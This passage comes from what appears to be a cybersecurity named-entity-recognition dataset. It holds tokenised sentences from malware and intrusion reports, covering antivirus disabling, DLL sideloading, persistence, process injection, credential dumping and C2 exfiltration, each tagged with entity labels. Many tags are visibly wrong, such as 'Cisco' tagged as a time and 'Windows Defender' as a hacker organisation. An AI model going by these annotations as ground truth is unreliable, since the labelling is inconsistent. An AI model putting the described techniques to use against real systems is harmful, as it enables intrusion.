"O", "O", "B-Time", "O" ] }, { "tokens": [ "showing", "the", "“uninstall”", "commands", "for", "Windows", "Defender:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "DISABLING", "ANTIVIRUS/MALWARE", "SOFTWARE", "USING", "\".BAT\"", "FILES" ], "ner_tags": [ "B-Way", "B-Way", "B-SecTeam", "B-SecTeam", "B-Way", "B-Way" ] }, { "tokens": [ "were", "both", "designed", "to", "turn", "off", "Antivirus", "and", "Antimalware", "software." ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "designed", "to", "stop", "Cisco", "AMP." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stopping", "Cisco", "AMP", "/", "Disabling", "Microsoft", "Defender" ], "ner_tags": [ "O", "B-Time", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "From", "the", "two", "phishing", "emails,", "both", "attachments", "contain", "similar", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "phishing", "attachment", "was", "submitted", "to", "the", "target", "in", "a", "response", "to", "an", "ongoing", "conversation" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "downloaded,", "the", "initial", "attachment", "is", "a", "local", "HTML", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "were", "able", "to", "be", "decrypted", "by", "leveraging", "the", "decryption", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "adds", "itself", "to", "a", "scheduled", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "emulated", "C2", "Server", "is", "now", "running", "an", "HTTPS", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "shows", "that", "this", "connection", "was", "likely", "HTTPS" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "communication", "is", "consistent", "with", "HTTP/S", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "on", "TCP", "port", "2222." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "most", "of", "the", "connection", "attempts", "to", "the", "C2", "IP’s", "are", "conducted", "over", "TCP", "port", "443." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Due", "to", "TCP", "port", "2222’s", "common", "use", "as", "an", "alternate", "port", "for", "SSH", "communication,", "the", "Malware", "Analyst", "recorded", "a", "manual", "SSH", "connection", "to", "the", "emulated", "C2", "host" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "some", "data", "exfiltration", "or", "interaction", "with", "the", "downloaded", "second", "stage", "from", "the", "C2." ], "ner_tags": [ "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "show", "the", "transfer", "of", "files", "using", "SMB." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "Files", "commonly", "observed", "transferred", "via", "SMB", "include" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Showing", "the", "Transfer", "of", "Cobalt", "Strike", "Beacons", "using", "RDPClip:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "allows", "for", "lateral", "movement", "leveraging", "RPC", "to", "create", "SMB", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "indicating", "the", "use", "of", "Remote", "Desktop", "Protocol.[" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Showing", "the", "Transfer", "of", "Cobalt", "Strike", "Beacons", "using", "RDPClip:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "use", "of", "RDP", "by", "the", "Threat", "Actor" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "second", "encoded", "Base64", "string", "was", "not", "only", "base64", "but", "also", "Gziped", "for", "size", "and", "obfuscation." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "some", "simple", "but", "clever", "obfuscation", "in", "place." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "shows", "the", "decoded", "and", "uncompressed", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "payload", "decoder", "from", "Github" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "used", "to", "decode", "the", "body" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Task", "manager", "was", "then", "use", "to", "reveal", "the", "service", "running", "on", "PID", "3488," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg" ] }, { "tokens": [ "requests", "using", "RC4", "encryption" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "was", "abused", "by", "the", "attacker", "to", "steal", "client", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "the", "malware", "copied", "itself", "to", "\"$CURRENTUSER\\AppData\\Roaming\\Microsoft\\Isoaahffo\\djkuuhd.dll,\"", "as", "confirmed", "by", "the", "file's", "hashes", "shown", "below,", "and", "sets", "itself", "to", "auto", "run." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "process", "imbedded", "itself", "into", "wermgr.exe,", "the", "Windows", "Error", "Reporting", "Manager", "(Process", "ID", "6660)." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "uses", "a", "mixture", "of", "disguising", "the", "ASCII", "as", "UTF-16", "via", "manipulating", "the", "start", "of", "the", "file,", "as", "well", "as", "obfuscating", "the", "data", "using", "a", "simple", "cypher." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "running", "the", "malware", "sets", "itself", "up", "as", "the", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "after", "reaching", "the", "local", "DC,", "the", "attacker", "was", "able", "to", "gain", "a", "better", "lay", "of", "the", "land", "and", "observe", "the", "presence", "of", "the", "other", "two", "domains." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "technique", "leveraging", "the", "Windows", "Management", "Instrumentation", "(WMI)", "service", "to", "execute", "malicious", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "indicating", "that", "the", "user", "deleted", "the", "collected", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "group", "utilizes", "sideloading" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "DLL", "for", "sideloading" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "The", "group", "uses", "DLL", "sideloading" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "detect", "and", "remove", "Alibaba", "Cloud", "Security", "from", "compromised", "instances" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "relied", "on", "their", "victims", "to", "execute", "the", "malicious", "MSI", "installers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "cmd.exe", "to", "download", "files", "from", "Alibaba", "Cloud", "Object", "Storage", "Service." ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "OSSUTIL", "(included", "in", "the", "installer", "package", "as", "ssu.exe)", "to", "download", "files" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "use", "API", "calls", "such", "as", "VirtualAlloc", "to", "load", "and", "execute", "malicious", "components", "into", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O" ] }, { "tokens": [ "invokes", "the", "Windows", "API", "function", "DisableThreadLibraryCalls" ], "ner_tags": [ "B-Features", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "create", "scheduled", "tasks", "to", "achieve", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Create", "scheduled", "tasks", "to", "execute", "the", "loader", "and", "updater", "components" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "scheduled", "tasks", "created", "for", "the", "updater," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "four", "scheduled", "tasks", "are", "created:" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "registry", "Run", "key", "to", "achieve", "persistence" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "various", "encryption", "algorithms", "to", "hide", "payloads", "and", "strings." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O" ] }, { "tokens": [ "execute", "an", "encrypted", "payload", "located", "in", "the", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "an", "XOR-encrypted", "payload,", "divided", "into", "three", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "a", "different,", "single", "byte", "XOR", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "dynamic", "API", "resolution", "to", "avoid", "detection." ], "ner_tags": [ "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "calling", "an", "export", "function", "of", "the", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reconstructs", "the", "imports", "table", "of", "the", "DLL", "and", "calls", "the", "DllEntryPoint," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "DLL", "will", "find", "the", "address", "of", "an", "export", "function", "called", "SVP7,", "which", "contains", "the", "entry", "point", "of", "the", "malware," ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "DLL", "side-loading", "to", "execute", "their", "malicious", "payloads" ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "side-loading", "a", "malicious", "DLL,", "libpng13.dll" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "by", "side-loading", "dr.dll,", "used", "by", "a", "legitimate,", "signed", "binary" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ ",", "side-loaded", "by", "the", "same", "legitimate", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "shellcode", "and", "an", "embedded", "DLL", "file", "that", "loads", "FatalRAT" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "an", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "execute", "an", "encrypted", "payload", "located", "in", "the", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "keylogger", "functionalities" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Capture", "keystrokes" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "encrypts", "data", "with", "a", "custom", "encryption", "algorithm", "before", "it", "is", "sent", "to", "the", "C&C", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "TCP", "for", "C&C", "communications." ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "exfiltrates", "data", "over", "the", "same", "channel", "used", "for", "C&C" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drop", "a", "file", "named", "ossutilconfig", "in", "the", "%USERPROFILE%", "directory" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Drop", "and", "execute", "the", "legitimate", "installer", "in", "C:\\Program", "Files\\Common", "Files", "(see", "CommonFiles64Folder)." ], "ner_tags": [ "B-Features", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "by", "side-loading", "dr.dll,", "used", "by", "a", "legitimate,", "signed", "binary" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "original", "libpng13.dll", "is", "also", "included", "in", "the", "installer", "package", "(renamed", "to", "what", "appears", "to", "be", "a", "random", "name)", "because", "the", "malicious", "DLL", "forwards", "its", "exported", "functions", "to", "the", "original", "DLL." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "files", "from", "an", "attacker-controlled", "bucket", "in", "Alibaba", "Cloud" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "and", "execute", "further", "shellcode" ], "ner_tags": [ "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "the", "loader", "with", "many", "calls", "to", "a", "function", "that", "just", "prints", "some", "hardcoded", "values" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "decrypt," ], "ner_tags": [ "O" ] }, { "tokens": [ "decrypts", "the", "payload", "is", "the", "same", "as", "the", "function", "used", "in", "FatalRAT", "to", "decrypt", "its", "configuration" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "its", "configuration", "strings" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "decompiled", "code", "used", "to", "decrypt", "strings" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decompiled", "code", "of", "a", "function", "used", "by", "a", "FatalRAT" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "using", "a", "variety", "of", "software", "packers" ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool" ] }, { "tokens": [ "one", "Zip", "contained", "a", "benign", "file", "named", "screenshot1242.jpeg", "and", "another", "contained", "a", "file", "named", "privatecopy.pdf." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "When", "someone", "tries", "to", "double-click", "these", "decoy", "files,", "Windows", "(or", "the", "application", "mapped", "to", "the", "relevant", "filetype)", "throws", "an", "error", "because", "the", "file", "isn’t", "the", "type", "of", "file", "it", "appears", "to", "be" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "target", "would", "then,", "naturally,", "double", "click", "the", "other", "file", "in", "the", "Zip", "archive" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "command", "pulls", "down", "a", "Visual", "Basic", "script,", "drops", "it", "into", "the", "C:\\Windows\\Tasks", "folder,", "and", "executes", "it." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "90", "other", "encrypted" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "A", "heavily", "obfuscated", "VBS" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "initial", "infector", "is", "a", "Visual", "Basic", "script,", "heavily", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "A", "block", "of", "base64-encoded,", "encrypted", "data", "comprises", "almost", "150KB", "of", "that", "script," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "segments", "of", "base64", "data" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "along", "with", "code", "that", "decodes", "and", "decrypts", "the", "block", "of", "base64." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "decoded,", "the", "content", "of", "the", "Ir8", "variable", "(a", "segment", "of", "which", "is", "shown", "below)", "turns", "out", "to", "be", "just", "another", "encoded", "PowerShell", "script,", "which", "the", "VBS", "decodes", "and", "then", "executes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PowerShell", "script", "decoded", "from", "the", "Ir8", "variable", "uses", "Reflection." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "performs", "a", "BXOR", "to", "decode", "the", "bytes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "for", "the", "Ir8", "script", "to", "decode." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "These", "work", "in", "tandem", "to", "insert", "data", "into", "the", "Windows", "Registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "concatenated", "segments", "of", "base64", "data", "from", "O7", "get", "inserted", "into", "the", "Registry," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "load", "the", "final", "payload", "into", "memory", "from", "a", "Registry", "value", "without" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "created", "a", "Run", "key", "in", "the", "Registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "And", "that", "Run", "key", "references", "a", "different", "Registry", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "On", "one", "machine,", "we", "found", "that", "the", "malware", "injected", "itself,", "using", "process", "hollowing,", "into", "ielowutil.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "obfuscated", "with", "legitimate", "resources" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "stack", "strings" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Embedded", "Resource" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "shellcode", "from", "the", ".data", "section" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "shellcode", "that", "was", "stored", "in", "the", ".data", "section", "is", "now", "stored", "in", "the", ".rsc", "section" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "advapi32.CryptHashData" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "will", "create", "a", "key", "using", "advapi32.CryptDeriveKey" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "advapi32.CryptEncrypt" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "kernel32.LoadLibraryA,", "kernel32.GetProcAddress,", "kernel32.VirtualAlloc,", "kernel32.VirtualProtect", "and", "ntdll.ZwFlushInstructionCache" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "kernel32.VirtualALloc" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "kernel32.VirtualProtect," ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "kernel32.GetLastError" ], "ner_tags": [ "O" ] }, { "tokens": [ "kernel32.CreateMutexA" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "wininet.HttpSendRequestA," ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "shellcode", "injection" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "copy", "each", "PE", "section", "one", "at", "a", "time" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "another", "PE", "in", "memory," ], "ner_tags": [ "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "injecting", "a", "PE", "executable" ], "ner_tags": [ "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "handle", "to", "the", "current", "process", "for", "the", "purpose", "of", "allocating", "memory", "with", "PAGE_EXECUTE_READWRITE", "permissions" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "decrypt", "the", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decyrpt", "its", "C2", "configuration" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "get", "a", "pointer", "to", "the", "encrypted", "shellcode", "and", "to", "decrypt", "it", "have", "been", "broken", "out", "into", "their", "own", "separate", "functions" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "need", "to", "resolve", "these", "APIs", "dynamically", "to", "interact", "with", "the", "Windows", "operating", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "resolving", "many", "different", "Windows", "APIs", "using", "kernel32.GetProcAddress" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "enumerating", "the", "Process", "Environment", "Block", "(PEB)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "HEAD", "request" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "check", "if", "it", "is", "connected", "to", "the", "internet", "by", "making", "a", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "make", "a", "HTTP", "GET", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "make", "a", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "NBTScan", "for", "network", "reconnaissance" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "System", "Network", "Connections", "Discovery" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "PsExec", "for", "lateral", "movement" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "obtained", "credentials", "for", "pivoting", "with", "Mimikatz" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "detect", "memory", "dumps", "of", "the", "lsass", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OS", "Credential", "Dumping:", "LSASS", "Memory" ], "ner_tags": [ "O", "B-SecTeam", "B-SecTeam", "O", "O" ] }, { "tokens": [ "had", "been", "archived" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "encrypted", "copy" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "encrypting", "the", "base", "encryption", "key", "with", "RSA", "(with", "a", "hard-coded", "1024-byte", "public", "key)", "and", "encoding", "it", "in", "Base64." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uploaded." ], "ner_tags": [ "O" ] }, { "tokens": [ "Exfiltration", "Over", "C2", "Channel" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "run", "bruteforcing", "offline." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "scan", "hosts", "for", "so-called", "Eternal*", "SMB", "vulnerabilities", "with", "SMBTouch", "and", "then,", "where", "possible,", "run", "the", "EternalBlue", "exploit", "and", "infect", "the", "computer" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "B-Features", "B-Exp", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O" ] }, { "tokens": [ "Exploitation", "of", "Remote", "Services" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "SysUpdate", "and", "HyperBro", "backdoors", "were", "installed" ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "push", "Polar", "ransomware", "to", "computers", "and", "run", "it," ], "ner_tags": [ "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Three", "files", "are", "sent", "to", "the", "victim's", "computer:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obtained", "the", "credentials", "of", "a", "domain", "administration", "at", "headquarters" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "account", "of", "the", "compromised", "domain", "admin" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valid", "Accounts:", "Domain", "Accounts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "is", "a", ".NET", "DLL", "library", "(compiled", "on", "April", "29,", "2020)", "imported", "when", "GDFInstall.exe", "is", "run" ], "ner_tags": [ "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "XOR", "decrypted", "with", "key", "ABCSCDFRWFFSDJJHGYUOIj." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "decoded", "with", "Base64" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypts", "a", "third", "component" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "and", "decoded", "version" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Deobfuscate/Decode", "Files", "or", "Information" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "payload", "and", "intermediate", "library", "are", "deleted", "before", "completion" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "the", "intermediate", "DLL", "library", "and", "encrypted", "ransomware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "del" ], "ner_tags": [ "O" ] }, { "tokens": [ "del" ], "ner_tags": [ "O" ] }, { "tokens": [ "yielding", "a", "PE", "file", "that", "is", "loaded", "and", "run", "in", "memory", "with", ".NET." ], "ner_tags": [ "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "wmic" ], "ner_tags": [ "O" ] }, { "tokens": [ "Windows", "Management", "Instrumentation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "wmic" ], "ner_tags": [ "O" ] }, { "tokens": [ "cmd.exe", "Command", "and", "Scripting", "Interpreter:", "Windows", "Command", "Shell", "looks", "for", "list", "of", "connected", "disks", "and", "starts", "recursive", "traversal", "of", "directories", "sends", "an", "HTTP", "POST", "request", "with", "the", "name", "of", "the", "victim's", "computer", "to", "a", "server", "T1071" ], "ner_tags": [ "B-SamFile", "O", "O", 